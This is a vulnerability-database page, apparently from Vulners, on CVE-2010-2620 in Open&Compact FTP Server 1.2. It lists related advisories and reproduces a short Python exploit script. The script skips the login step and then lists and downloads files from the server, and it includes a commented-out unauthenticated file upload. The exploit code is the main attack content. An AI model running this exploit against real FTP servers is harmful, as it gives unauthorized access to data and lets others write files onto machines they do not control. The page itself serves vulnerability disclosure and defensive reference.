(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Open&Compact FTP Server 1.2 - Auth Bypass & Directory Traversal SAM Retrieval Exploit | 7 Aug 201300:00 | – | zdt | |
| Open-FTPD 1.2 Arbitrary File Upload Vulnerability | 13 Aug 201300:00 | – | zdt | |
| CVE-2010-2620 | 18 Jun 201000:00 | – | circl | |
| CVE-2010-2620 | 2 Jul 201020:00 | – | cve | |
| CVE-2010-2620 | 2 Jul 201020:00 | – | cvelist | |
| (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval | 7 Aug 201300:00 | – | exploitdb | |
| Open-FTPD 1.2 - Arbitrary File Upload (Metasploit) | 13 Aug 201300:00 | – | exploitdb | |
| Open-FTPD 1.2 Arbitrary File Upload | 18 Jun 201200:00 | – | metasploit | |
| CVE-2010-2620 | 2 Jul 201020:30 | – | nvd | |
| Open-FTPD Authentication Bypass Vulnerability | 16 Jul 201000:00 | – | openvas |
10
# Exploit Title: Open&Compact Ftp Server <= 1.2 Full System Access
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
#!/usr/bin/python
# Simply by omitting login process to the open ftp server it is possible
# to execute any command, including but not limited to: listing files,
# retrieving files, storing files.
# Below is an example of a few commands.
# If you want to test storing files with no authentication, create a
# test file and uncomment out line with ftp.storbinary function call.
# Any command will work as long as there is at least on user who has the permission
# to execute that command. For example, storing files will work as long
# as there is one user with write permission. No matter whom it is.
import ftplib
import os
# Connect to server
ftp = ftplib.FTP( "127.0.0.1" )
ftp.set_pasv( False )
# Note that we need no authentication at all!!
print ftp.retrlines( 'LIST' )
print ftp.retrbinary('RETR changelog.txt', open('changelog.txt', 'wb').write )
# filename = 'test.txt'
# f = open( filename, 'rb' )
# print ftp.storbinary( 'STOR ' + filename, f )
# f.close()
ftp.quit()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jun 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.29555